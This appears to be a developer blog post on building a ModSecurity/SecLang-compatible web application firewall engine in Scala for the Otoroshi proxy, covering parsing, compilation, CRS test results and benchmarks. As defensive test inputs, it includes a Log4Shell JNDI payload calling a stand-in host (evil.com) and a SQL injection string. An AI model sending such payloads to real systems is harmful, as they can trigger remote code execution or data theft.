Skip to main content

Command Palette

Search for a command to run...

Building a JVM-Native WAF: A Journey from WASM to Pure Scala

How I spent my Christmas holidays building a SecLang-compatible Web Application Firewall (almost) from scratch

Updated
19 min read
Building a JVM-Native WAF: A Journey from WASM to Pure Scala

For the past two years, Otoroshi has had a Web Application Firewall powered by Coraza, the excellent Go implementation of ModSecurity. To achieve that, we compiled Coraza to WebAssembly (wasm) and ran it inside Otoroshi using our wasm virtual machines orchestrator wasm4s. It worked really great, especially when you don't have a lot of WAF configuration. But as we scaled the number of WAF configurations and number of concurrent WASM VM instances to hundreds, cracks started to show. Due to the stateful nature of the Coraza WASM integration, one configuration (list of SecLang statement, typically different for each tenant) is tied to one WASM VM. We cannot initialize a generic WASM VM and dynamically inject a different configuration for each evaluation. So naturally, with hundreds of possible configurations, memory exploded, latency increased and configurations became unmanageable.

This is the story of how I built a complete SecLang engine in Scala during my Christmas vacation (well you know, after the kids went to bed!), why I did it, and all the technical challenges along the way.

The Problem with WASM-Based WAFs

Before diving into the solution, let me explain why we needed one in the first place.

Our WASM-based Coraza integration had several pain points:

  1. Single-threaded execution: WASM is inherently single-threaded. To handle concurrent requests, we had to spin up multiple WASM virtual machines per WAF configuration.

  2. Memory footprint: Each WASM instance loads a ~20MB binary. Multiply that by the number of instances needed for multi-tenancy / concurrency, and memory usage adds up fast.

  3. Serialization overhead: Every request had to be serialized from JVM objects to WASM-compatible structures, processed, then deserialized back. At scale, this serialization dance became a measurable bottleneck.

  4. Configuration duplication: Each WASM instance needed its own copy of the rules. No sharing, no caching, no composition.

In short: WASM solved portability, but exposed scalability limits in our very specific multi-tenant configuration model at Cloud APIM. What we needed was a native JVM implementation: thread-safe, memory-efficient, and designed for multi-tenant environments where configurations can be shared and composed. At that scale, the limiting factor was not WebAssembly itself, but the way execution environments and configurations were coupled.

Understanding the Landscape: ModSecurity, SecLang, and CoreRuleSet

Before I explain how I built the solution, let's make sure we're all on the same page about the ecosystem.

ModSecurity: The Grandfather of WAFs

ModSecurity is the most widely deployed open-source Web Application Firewall. Originally created for Apache in 2002, it later became a standalone library that can be embedded in any web server or proxy.

ModSecurity itself doesn't block attacks—it provides the engine. You feed it rules, and it evaluates incoming requests against those rules.

SecLang: The Rule Language

SecLang (or "SecRule Language") is the domain-specific language used to write ModSecurity rules. It's become a de facto standard—virtually every serious WAF implementation understands SecLang rules.

Here's what a typical SecLang rule looks like:

SecRule REQUEST_HEADERS:User-Agent "@pm firefox chrome safari" \
    "id:1001,\
    phase:1,\
    pass,\
    t:none,t:lowercase,\
    msg:'Browser detected',\
    tag:'browser-detection'"

Let's break this down:

  • SecRule: The directive that defines a rule

  • REQUEST_HEADERS:User-Agent: The variable to inspect (HTTP User-Agent header)

  • @pm firefox chrome safari: The operator (@pm = phrase match, checks if any of the words appear)

  • id:1001: Unique rule identifier

  • phase:1: When to execute (phase 1 = after headers are received)

  • pass: Action to take on match (continue processing)

  • t:none,t:lowercase: Transformations to apply before matching

  • msg:'...': Log message when rule matches

  • tag:'...': Categorization tag

SecLang supports five execution phases:

PhaseNameWhen
1Request HeadersAfter request headers are received
2Request BodyAfter request body is received
3Response HeadersAfter response headers are received
4Response BodyAfter response body is received
5LoggingBefore logging

OWASP CoreRuleSet: The Industry Standard

The OWASP CoreRuleSet (CRS) is a comprehensive set of SecLang rules that protect against common web attacks:

  • SQL Injection

  • Cross-Site Scripting (XSS)

  • Local File Inclusion (LFI)

  • Remote Code Execution

  • Protocol violations

  • And dozens more categories

CRS is battle-tested, regularly updated, and used by major CDNs and WAF vendors worldwide. Any serious SecLang implementation needs to be CRS-compatible.

The current version (CRS 4.x) contains over 600 rules organized into categories like:

REQUEST-911-METHOD-ENFORCEMENT.conf
REQUEST-913-SCANNER-DETECTION.conf
REQUEST-920-PROTOCOL-ENFORCEMENT.conf
REQUEST-930-APPLICATION-ATTACK-LFI.conf
REQUEST-932-APPLICATION-ATTACK-RCE.conf
REQUEST-933-APPLICATION-ATTACK-PHP.conf
REQUEST-941-APPLICATION-ATTACK-XSS.conf
REQUEST-942-APPLICATION-ATTACK-SQLI.conf
REQUEST-949-BLOCKING-EVALUATION.conf
...

To sum it up: ModSecurity is the engine, SecLang is the language, and CRS is the knowledge base.

The Christmas Project Begins

It was late December, and I was looking for a fun side project. I had been pondering the WAF problem for months—maybe years— but always convinced myself it was too complex. The SecLang parser alone seemed like a mountain. I'd already tried some approaches using scala parser combinators, fastparse, even regular expressions, but nothing seemed to work 100% of the time.

Then I stumbled upon seclang_parser—an ANTLR grammar for SecLang, maintained by the CoreRuleSet team. Suddenly, the mountain looked more like a hill.

Here's the high-level architecture I ended up building:

The key insight: compilation happens once, evaluation happens per-request. Let's walk through each component.

Part 1: The Parser

ANTLR to the Rescue

ANTLR (Another Tool for Language Recognition) is a parser generator that reads grammar files and produces parsers in various target languages. Given a .g4 grammar file, ANTLR generates a lexer, parser, and visitor/listener classes.

I took the seclang_parser grammar and generated Java code:

antlr4 -visitor -package com.cloud.apim.seclang.antlr SecLangLexer.g4 SecLangParser.g4

This gave me a solid foundation, but ANTLR only handles the syntax—I still needed to build the AST (Abstract Syntax Tree).

Building the AST Visitor

ANTLR uses the visitor pattern. You extend the generated SecLangParserBaseVisitor class and implement methods for each grammar rule you care about.

class AstBuilderVisitor extends SecLangParserBaseVisitor[Any] {

  override def visitConfiguration(ctx: ConfigurationContext): Configuration = {
    val statements = ctx.statement().asScala.flatMap { stmtCtx =>
      Option(visitStmt(stmtCtx)).collect { case s: Statement => s }
    }.toList
    Configuration(statements)
  }

  override def visitSecRule(ctx: SecRuleContext): SecRule = {
    val variables = visitVariables(ctx.variables())
    val operator = visitOperator(ctx.operator())
    val actions = Option(ctx.actions()).map(visitActions)
    SecRule(None, variables, operator, actions, ctx.getText)
  }

  // ... hundreds more visitor methods
}

The parser entry point is simple:

object AntlrParser {
  def parse(input: String): Either[String, Configuration] = {
    val lexer = new SecLangLexer(CharStreams.fromString(input))
    val tokens = new CommonTokenStream(lexer)
    val parser = new SecLangParser(tokens)

    val errorListener = new CollectingErrorListener()
    parser.removeErrorListeners()
    parser.addErrorListener(errorListener)

    val tree = parser.configuration()

    if (errorListener.hasErrors) {
      Left(errorListener.getErrors.mkString("\n"))
    } else {
      val visitor = new AstBuilderVisitor()
      Right(visitor.visitConfiguration(tree))
    }
  }
}

This was the foundation. With my friend Claude's help, I was able to flesh out all the visitor methods and handle the quirks of SecLang syntax. The parser visitor alone is about 400 lines of Scala (backed by 11k lines of Java generated by ANTLR).

Part 2: The Compiler

Once I had an AST, I needed to transform it into something executable. Over time, it became clear that a SecLang engine is less about request filtering and more about interpreting a security-specific programming language under strict performance constraints. The compiler's job is to:

  1. Resolve rule chains: SecLang allows chaining rules with the chain action—if the first rule matches, check the second, and so on.

  2. Organize by phase: Group rules by their execution phase for efficient processing.

  3. Handle rule removals: Process SecRuleRemoveById, SecRuleRemoveByTag, etc.

  4. Index markers: For skipAfter actions, pre-compute marker positions.

  5. Pre-compile regexes: Compile regular expressions once, not on every evaluation.

Here's a simplified view of the chain resolution logic:

def compileChains(rules: List[SecRule]): List[RuleChain] = {
  var chains = ListBuffer[RuleChain]()
  val current = ListBuffer[SecRule]()

  for (rule <- rules) {
    current += rule
    if (!rule.isChain) {
      // Chain complete, emit it
      chains += RuleChain(current.toList)
      current.clear()
    }
  }

  chains.toList
}

The compiler outputs a CompiledProgram:

case class CompiledProgram(
  chains: Map[Int, List[RuleChain]],   // phase -> chains
  markers: Map[String, Int],           // marker name -> index
  mode: EngineMode                     // On, Off, or DetectionOnly
)

Part 3: The Runtime Engine

This is where the real work happens. The engine evaluates a CompiledProgram against a RequestContext and returns a disposition (continue or block).

The Core Loop

Here's a simplified view of the core loop logic:

def evaluate(ctx: RequestContext, phases: List[Int]): EngineResult = {
  var state = RuntimeState.initial(program.mode)

  for (phase <- phases if state.shouldContinue) {
    for (chain <- program.chains.getOrElse(phase, Nil)) {
      val result = evaluateChain(chain, ctx, state)
      state = result.state

      result.disposition match {
        case Disposition.Block(status, msg, ruleId) =>
          // Early exit
          return EngineResult(
            Disposition.Block(status, msg, ruleId), 
            state
          )
        case Disposition.Continue =>
          // Keep going
      }
    }
  }

  EngineResult(Disposition.Continue, state)
}

Variables, Transformations, Operators, Actions

The engine implements four key components, all following the same pattern—Scala pattern matching over the AST:

  • Variables (30+): Extract data from the request (REQUEST_URI, REQUEST_HEADERS, ARGS, COOKIES, etc.). Support collection access with keys and regex selectors like REQUEST_HEADERS:/^X-Custom-/.

  • Transformations (25+): Normalize values before matching (lowercase, urlDecode, base64Decode, htmlEntityDecode, removeWhitespace, etc.). Can be chained: t:lowercase,t:urlDecode.

  • Operators (15+): Perform the actual matching (@rx for regex, @pm for phrase match, @contains, @beginsWith, @ipMatch, @detectSQLi, @detectXSS, etc.).

  • Actions: Execute on match (block, pass, deny, setvar for TX variables, skip, skipAfter for flow control, etc.).

Here's a taste of how operators are implemented:

def matchOperator(op: Operator, value: String): Boolean = op match {
  case Operator.Rx(pattern) => RegexPool.regex(pattern).findFirstIn(value).isDefined
  case Operator.Pm(phrases) => phrases.exists(p => value.toLowerCase.contains(p.toLowerCase))
  case Operator.Contains(s) => value.contains(s)
  case Operator.IpMatch(ranges) => ranges.exists(_.contains(InetAddress.getByName(value)))
  // ... etc
}

Part 4: The libinjection Challenge

As I was implementing operators, I hit a wall: SecLang includes @detectSQLi and @detectXSS operators that use libinjection, a C library for detecting SQL injection and XSS attacks. There was no Java/Scala port. So I had two options:

  • give up

  • or port a 4,000-line C security library to Java

Guess which one I chose.

libinjection uses a clever technique: instead of regex patterns, it tokenizes input and generates a "fingerprint" that's matched against known attack patterns. For example, the SQL input 1' OR '1'='1 gets tokenized and folded into [s, &, s] (string, boolean operator, string), then matched against 9,000+ known SQLi fingerprints. XSS detection works similarly using HTML5 tokenization to detect dangerous tags, attributes, and URL schemes.

The port took considerable effort—the original C code is 4,000+ lines with lots of pointer arithmetic. My friend Claude's help was invaluable here, helping me translate idioms and catch edge cases. The result is libinjection-jvm, a zero-dependency Java library with full test suite compatibility.

Part 5: The CoreRuleSet Test Suite

Building the engine was one thing. Proving it worked was another.

The CoreRuleSet project includes a comprehensive test suite with over 4,000 tests in YAML format:

- test_id: 1
  desc: "Test SQL injection detection"
  stages:
    - input:
        method: "GET"
        uri: "/test?id=1' OR '1'='1"
      output:
        log:
          expect_ids: [942100]

I wrote a test runner that:

  1. Parses the YAML test definitions

  2. Constructs RequestContext objects from the test input

  3. Runs the engine against the CRS rules

  4. Verifies the expected outcome (blocked or allowed)

The CRS test suite turned out to be as much a specification of behavior as a validation tool.

The first run: 40% pass rate and after a few hours of simple fixes: 60% pass rate.

Then began the debugging marathon. Some failures were engine bugs. Others were test runner bugs. A few were my misunderstanding of SecLang semantics.

Test: 942100-1
Expected: BLOCKED
Got: ALLOWED
Rule: SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|... "@rx (?i)..." ...
Issue: Regex flag handling in negative lookahead

One by one, I fixed issues:

  • Regex flags not properly propagated

  • TX variable increment semantics

  • Chain evaluation short-circuit logic

  • Transformation ordering

  • Case sensitivity in header matching

  • Phase 5 logging-only rules incorrectly blocking

This part was an emotional roller coaster—some patches would fix only a single test while others would fix around 200 at once. But after one week of work: 100% pass rate across 4,138 tests.

{
  "global_stats": {
    "passing_percentage": 100,
    "total_tests": 4174,
    "success_tests": 4174,
    "failure_tests": 0
  },
  "time_stats": {
    "total_time_ms": 25945,
    "avg_time_ms": 6,
    "min_time_ms": 1,
    "max_time_ms": 4242
  }
}

The Apache Problem

Here's something I didn't anticipate: the official CRS test suite was designed to test ModSecurity + CRS running inside Apache, in a Docker container. The test harness sends real HTTP requests to the container and checks the responses.

The problem? Some tests weren't actually testing WAF behavior—they were testing Apache's behavior. For example, Apache rejects certain malformed requests (invalid characters in URIs, malformed HTTP lines) before they even reach ModSecurity. The test expected a block, but the block came from Apache, not from CRS rules.

When running the same tests against a pure SecLang engine with no Apache in front, these tests would fail—not because my engine was wrong, but because the test assumed Apache's preprocessing.

Since my test runner evaluates rules directly (no reverse proxy involved), I had to identify these cases and change the acceptance criteria. Instead of checking that the server responds with a 400 status (which would be Apache's doing), I modified the tests to verify that a specific CRS rule was matched. Same malicious input, but now testing the actual WAF behavior. This work could potentially benefit the upstream CRS project for anyone building alternative SecLang implementations.

Part 6: The Factory Pattern for Multi-Tenancy

At Cloud APIM, we run multi-tenant infrastructure. Multiple customers can share Otoroshi instances (or use their own), each with their own WAF configurations. We needed:

  1. Shared base rules: CRS loaded once, shared across all tenants

  2. Per-tenant customization: Each tenant can add/remove rules

  3. Efficient caching: Compiled programs cached and reused

In practice, multi-tenancy tends to turn configuration into a first-class scalability concern, on par with CPU and memory.

The solution: a factory pattern with presets.

// Define reusable presets
val presets = Map(
  "crs" -> SecLangPreset.fromResources("crs",
    "/coreruleset/crs-setup.conf.example",
    "/coreruleset/rules/*.conf"
  )
)

// Create factory
val factory = SecLang.factory(presets)

// Tenant-specific configuration
val tenantRules = List(
  "@import_preset crs",
  """SecRuleRemoveById 942100""",  // Disable specific rule
  """SecRule REQUEST_URI "@contains /health" "id:10001,phase:1,allow,nolog" """,
  "SecRuleEngine On"
)

// Get compiled engine (cached)
val engine = factory.engine(tenantRules)

The factory:

  • Compiles each unique rule configuration once

  • Caches CompiledProgram instances with configurable TTL

  • Supports rule composition through preset imports

  • Thread-safe for concurrent access

Part 7: Otoroshi Integration

The final piece: integrating the engine into Otoroshi as an extension. Otoroshi is an open-source HTTP reverse proxy written in Scala that I created several years ago. One of the main perks of Otoroshi is that it's a very extensible project where you can easily write and use your own plugins and extensions.

The WAF Configuration Entity

With this extension, a new entity becomes available to configure WAF behavior (not an actual WAF instance per se, but you know what I mean). One important aspect here is the ability to toggle body inspection. By design, Otoroshi doesn't load request or response bodies into memory—it streams them. So there's a tradeoff: enabling body inspection makes Otoroshi a bit slower and heavier on RAM, but allows the WAF to detect attacks hidden in payloads.

case class CloudApimWafConfig(
  id: String,
  name: String,
  enabled: Boolean = true,
  block: Boolean = true,              // Block vs. monitor-only
  inspectInputBody: Boolean = true,
  inspectOutputBody: Boolean = true,
  inputBodyLimit: Option[Long] = None,
  outputBodyLimit: Option[Long] = None,
  outputBodyMimetypes: Seq[String] = Seq.empty,
  rules: Seq[String] = Seq.empty
)

Configuration example:

{
  "id": "waf-config_production",
  "name": "Production WAF",
  "enabled": true,
  "block": true,
  "inspect_input_body": true,
  "inspect_output_body": true,
  "input_body_limit": 1048576,
  "output_body_limit": 1048576,
  "output_body_mimetypes": ["text/html", "application/json"],
  "rules": [
    "@import_preset crs",
    "SecRuleRemoveById 942100",
    "SecRuleEngine On"
  ]
}

The Plugin

The plugin hooks into Otoroshi's request/response pipeline:

class CloudApimWaf extends NgRequestTransformer {

  override def transformRequest(ctx: NgTransformerRequestContext): Future[Either[Result, NgPluginHttpRequest]] = {
    val wafConfig = getConfig(ctx)
    val engine = ext.factory.engine(wafConfig.rules.toList)

    val requestCtx = buildRequestContext(ctx.request, ctx.body)
    val result = engine.evaluate(requestCtx, List(1, 2, 5))

    result.disposition match {
      case Disposition.Continue =>
        ctx.otoroshiRequest.rightf

      case Disposition.Block(status, msg, ruleId) if wafConfig.block =>
        emitEvent(result, ctx)
        Results.Status(status)(buildErrorResponse(msg, ruleId)).leftf

      case Disposition.Block(_, _, _) =>
        // Monitor mode - log but don't block
        emitEvent(result, ctx)
        ctx.otoroshiRequest.rightf
    }
  }

  override def transformResponse(ctx: NgTransformerResponseContext): Future[Either[Result, NgPluginHttpResponse]] = {
    // Similar logic for response phases (3, 4, 5)
  }
}

Performance Characteristics

After all optimizations, here's how the native implementation compares to our previous WASM-based solution:

MetricWASM (Coraza)Native (seclang-engine)
Memory per config~20MB/instance~20KB/instance + ~2MB (shared CRS)
Concurrency modelMultiple VMs neededOne engine per request, Single instance config., thread-safe
Rule sharingNone (duplicated per VM)Full sharing via presets
Serialization overheadJVM ↔ WASM on every requestZero (native objects)
Startup time~1500ms per VMone shot ~800ms to parse/compile CRS + ~10ms per uncached config.

And here are the raw performance numbers:

MetricValue
CRS evaluation on a legit request/responsearound 8ms
CRS evaluation on a suspicious requestaround 3ms for a Log4Shell attack
Regex compilationCached, zero-cost reuse

Compared to our WASM-based setup, the native engine:

  • uses ~1000x less memory per configuration,

  • removes serialization overhead,

  • scales naturally with JVM threads,

  • enables true multi-tenancy.

Here is a typical test running on my early 2024 MacBook Pro (M3 Pro), using oha with a legit request at 500 calls/sec over 1 minute:

$ oha -q 500 -c 200 -z 1m http://cawaf.oto.tools:9999 -H 'apk: foo' 

Summary:
  Success rate:    100.00%
  Total:    60004.7775 ms
  Slowest:    26.1541 ms
  Fastest:    2.2883 ms
  Average:    2.9967 ms
  Requests/sec:    500.0102

  Total data:    175.78 KiB
  Size/request:    6 B
  Size/sec:    2.93 KiB

Response time histogram:
   2.288 ms [1]     |
   4.675 ms [28740] |■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
   7.061 ms [961]   |■
   9.448 ms [221]   |
  11.835 ms [41]    |
  14.221 ms [17]    |
  16.608 ms [9]     |
  18.994 ms [2]     |
  21.381 ms [3]     |
  23.768 ms [3]     |
  26.154 ms [1]     |

Response time distribution:
  10.00% in 2.4673 ms
  25.00% in 2.5795 ms
  50.00% in 2.7420 ms
  75.00% in 3.0413 ms
  90.00% in 3.6479 ms
  95.00% in 4.4046 ms
  99.00% in 7.0370 ms
  99.90% in 12.2985 ms
  99.99% in 23.6878 ms


Details (average, fastest, slowest):
  DNS+dialup:    0.2206 ms, 0.1046 ms, 1.5284 ms
  DNS-lookup:    0.0247 ms, 0.0045 ms, 0.4549 ms

Status code distribution:
  [200] 29999 responses

now the same test with a Log4Shell attack request

$ oha -q 500 -c 200 -z 1m http://cawaf.oto.tools:9999 -H 'apk: ${jndi:ldap://evil.com/a}'

Summary:
  Success rate: 100.00%
  Total:  60003.4310 ms
  Slowest:  43.2109 ms
  Fastest:  1.9636 ms
  Average:  9.6649 ms
  Requests/sec: 499.9881

  Total data: 615.21 KiB
  Size/request: 21 B
  Size/sec: 10.25 KiB

Response time histogram:
    1.964 ms [1]     |
    4.508 ms [28517] |■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
    8.213 ms [1303]  |■
   13.338 ms [37]    |
   17.463 ms [73]    |
   21.587 ms [41]    |
   26.712 ms [25]    |
   30.837 ms [0]     |
   34.961 ms [0]     |
   39.086 ms [0]     |
   43.211 ms [2]     |

Response time distribution:
  10.00% in 2.2964 ms
  25.00% in 2.3817 ms
  50.00% in 2.5813 ms
  75.00% in 4.0106 ms
  90.00% in 3.5270 ms
  95.00% in 4.7680 ms
  99.00% in 6.6709 ms
  99.90% in 21.6669 ms
  99.99% in 25.4090 ms


Details (average, fastest, slowest):
  DNS+dialup: 0.9616 ms, 0.0578 ms, 4.4482 ms
  DNS-lookup: 0.0190 ms, 0.0028 ms, 1.4588 ms

Status code distribution:
  [400] 29999 responses

Key optimizations:

  1. RegexPool: Pre-compiled patterns cached by string key

  2. Early exit: Stop processing on first block disposition

  3. Phase-organized rules: Only load rules relevant to current phase

  4. Immutable programs: Compiled once, shared safely across threads

  5. TrieMap for TX variables: Thread-safe without locking

What's Not Implemented (Yet)

For transparency: not every SecLang feature made the cut. The missing pieces fall into three categories:

  1. Legacy cruft: Parity bit transformations (parityEven7bit, etc.) from the modem era. No modern use case.

  2. External dependencies: @geoLookup (needs MaxMind DB), @rbl (DNS lookups), SESSION variables (needs session store). These add latency and complexity—better handled by dedicated infrastructure components. Otoroshi has its own GeoIP plugin anyway.

  3. Domain-specific validation: @verifyCC, @verifyCPF, @verifySSN for credit cards and tax IDs. Not used by CRS, rarely needed in API security.

The 100% pass rate on CRS's 4,138 tests proves that everything needed for real-world protection is there. And if you do need something custom, the SecLangIntegration trait lets you hook in your own implementations without forking the engine.

Getting Started with seclang-engine

Want to try it yourself? Here's a minimal example showing how to use the library in your Scala project.

First, add the dependency to your build.sbt:

libraryDependencies += "com.cloud-apim" %% "seclang-engine" % "1.5.0"

Then, here's a complete working example:

import com.cloud.apim.seclang.model._
import com.cloud.apim.seclang.scaladsl.SecLang

object WafExample extends App {

  // 1. Define your SecLang rules
  val rules = """
    |SecRule REQUEST_HEADERS:User-Agent "@pm firefox" \
    |    "id:1001,\
    |    phase:1,\
    |    block,\
    |    t:none,t:lowercase,\
    |    msg:'Firefox browser blocked',\
    |    status:403,\
    |    severity:'CRITICAL'"
    |
    |SecRule REQUEST_URI "@contains /admin" \
    |    "id:1002,\
    |    phase:1,\
    |    block,\
    |    t:none,t:lowercase,\
    |    msg:'Admin access denied',\
    |    status:403"
    |
    |SecRuleEngine On
    |""".stripMargin

  // 2. Parse the rules into an AST
  val configuration = SecLang.parse(rules) match {
    case Left(error) => sys.error(s"Parse error: $error")
    case Right(config) => config
  }

  // 3. Compile the AST into an executable program
  val program = SecLang.compile(configuration)

  // 4. Create the engine
  val engine = SecLang.engine(program)

  // 5. Build a request context to evaluate
  val request = RequestContext(
    method = "GET",
    uri = "/api/users",
    headers = Headers(Map(
      "User-Agent" -> List("Mozilla/5.0 Chrome/120.0"),
      "Host" -> List("example.com")
    )),
    query = Map("page" -> List("1"))
  )

  // 6. Evaluate the request against phases 1 and 2
  val result = engine.evaluate(request, phases = List(1, 2))

  // 7. Check the result
  result.disposition match {
    case Disposition.Continue =>
      println("Request allowed")
    case Disposition.Block(status, msg, ruleId) =>
      println(s"Request blocked! Status: $status, Rule: $ruleId, Message: $msg")
  }
}

This example:

  • Defines two simple rules: one blocking Firefox browsers and one blocking /admin access

  • Parses the rules using ANTLR under the hood

  • Compiles them into an optimized program

  • Creates an engine instance (thread-safe, can be reused)

  • Evaluates a sample request and checks if it should be blocked

For production use with the OWASP CoreRuleSet, you can use the factory pattern with presets:

import com.cloud.apim.seclang.model._
import com.cloud.apim.seclang.scaladsl.{SecLang, SecLangPresets}

// Create a factory with CRS preset
val factory = SecLang.factory(Map("crs" -> SecLangPresets.coreruleset))

// Get an engine with CRS rules + custom exclusions
val engine = factory.engine(List(
  "@import_preset crs",           // Import all CRS rules
  "SecRuleRemoveById 942100",     // Disable a specific rule
  "SecRuleEngine On"
))

// The factory caches compiled programs, so subsequent calls
// with the same rules return the cached engine instantly

// Test with a malicious request (Log4Shell attack)
val maliciousRequest = RequestContext(
  method = "GET",
  uri = "/api/search",
  headers = Headers(Map(
    "User-Agent" -> List("Mozilla/5.0"),
    "Host" -> List("example.com"),
    "X-Api-Key" -> List("${jndi:ldap://evil.com/exploit}")  // Log4Shell payload
  ))
)

val result = engine.evaluate(maliciousRequest, phases = List(1, 2))

result.disposition match {
  case Disposition.Continue =>
    println("Request allowed")
  case Disposition.Block(status, msg, ruleId) =>
    println(s"Attack blocked! Rule $ruleId: $msg")
    // Output: Attack blocked! Rule 944150: Potential Remote Command Execution: Log4j / Log4shell
}

Open Source

All of this work is open source:

Since seclang-engine is a standalone library with both Java and Scala APIs, you can easily integrate it into any JVM project—whether it's a Jakarta EE application, Spring Boot, Quarkus, or Play Framework. Just add the dependency and start protecting your endpoints.

Conclusion

What started as a Christmas vacation project turned into a comprehensive WAF implementation. The journey taught me:

  1. Don't be intimidated by complexity: That ANTLR grammar turned an "impossible" parser into a weekend project.

  2. Test suites are gold: The CRS tests were invaluable for finding edge cases I never would have imagined.

  3. AI assistance is real: Claude Code helped me tackle the tedious parts (visitor methods, libinjection port) so I could focus on architecture.

  4. Multi-tenancy needs design: Caching and composition aren't afterthoughts—they need to be baked in from the start.

The new WAF is now running in production on Cloud APIM managed Otoroshi instances and on Otoroshi deployments on Clever Cloud. It's faster, more memory-efficient, and far more flexible than our WASM-based solution.

If you're interested in using seclang-engine in your own JVM projects, check out the repositories above. And if you have questions or want to contribute, feel free to open issues or PRs!

More from this blog